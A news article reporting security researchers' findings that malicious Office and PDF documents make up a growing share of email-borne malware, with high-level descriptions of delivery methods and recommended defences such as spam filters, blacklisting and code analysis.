Document-based malware on the rise, businesses warned

Document-based malware spiked in the first quarter of the year, building on a gradual rise in the past year, warn researchers

Nearly half (48%) of all malicious files detected in the past 12 months were some kind of document, an email analysis by researchers at Barracuda Networks has revealed.

More than 300,000 unique malicious documents were identified in the study, which researchers said indicates an alarming rise in the use of document-based malware.

This trend appears to be gaining momentum, with 59% of all malicious files detected in the first quarter of 2019 being documents, compared with 41% in the same period a year ago.

Evidence of this increased use of PDF documents and trusted Microsoft Office files to circumvent traditional firewalls and sandboxes to deliver malware was presented in a recent Cyber threat report by security firm SonicWall.

The report said researchers found threats in more than 47,000 PDFs and almost 51,000 Office files in 2018, representing a growing problem because most security controls cannot identify and mitigate the hidden malware contained in the files.  

In these document-based malware attacks, cyber criminals use email to deliver a document containing malware that is either hidden directly in the document itself or an embedded script downloads it from an external website.

Common types of malware include viruses, Trojans, spyware, worms and ransomware. In December 2018, a threat report from security firm Malwarebytes warned that the banking trojan/downloader/botnet known as Emotet, along with its commonly seen accomplice TrickBot, mainly use email distribution with malicious Office documents using PowerShell to download and launch the malware.

Most malware is sent as spam to widely circulated email lists, which are sold, traded, aggregated and revised as they move through the dark web, the researchers said.

These lists are then used to send malware, using various social engineering techniques to get users to open an attached malicious document. 

Once the document is opened, either the malware is automatically installed or a heavily obfuscated macro or script is used to download and install it from an external source.

Links or other clickable items are also used, but researchers said that approach is much more common in phishing attacks than malware attacks.

Archive files and script files are the other two most common attachment-based distribution methods for malware, the researchers said, noting that attackers often play tricks with file extensions to try to confuse users and get them to open malicious documents. 

Modern malware attacks are complex and layered, the researchers said, requiring complex systems to detect and block them. To defend against document-based and other malware attacks, they said organisations need to ensure they are using these security technologies, that include blacklisting, spam filters, phishing detection and advanced firewalls.

The researchers not that spammers are increasingly using their own infrastructure, which means the same IP addresses are often used long enough for software to detect and blacklist them. Even with hacked sites and botnets, it is possible to temporarily block attacks by IP once a large enough volume of spam has been detected. 

While many malicious emails appear to be genuine, the researchers said spam filters, phishing-detection systems and related security software can pick up subtle clues and help block potentially threatening messages and attachments from reaching email inboxes.

For emails with malicious documents attached, both static and dynamic code analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The web address for the executable can often be flagged using heuristics or threat intelligence systems, the researchers said, adding that obfuscation detected by static analysis can also indicate whether a document may be suspicious. 

If a user opens a malicious attachment or clicks a link to a drive-by download, the researchers said an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.

Read more about malware

Read more on Hackers and cybercrime prevention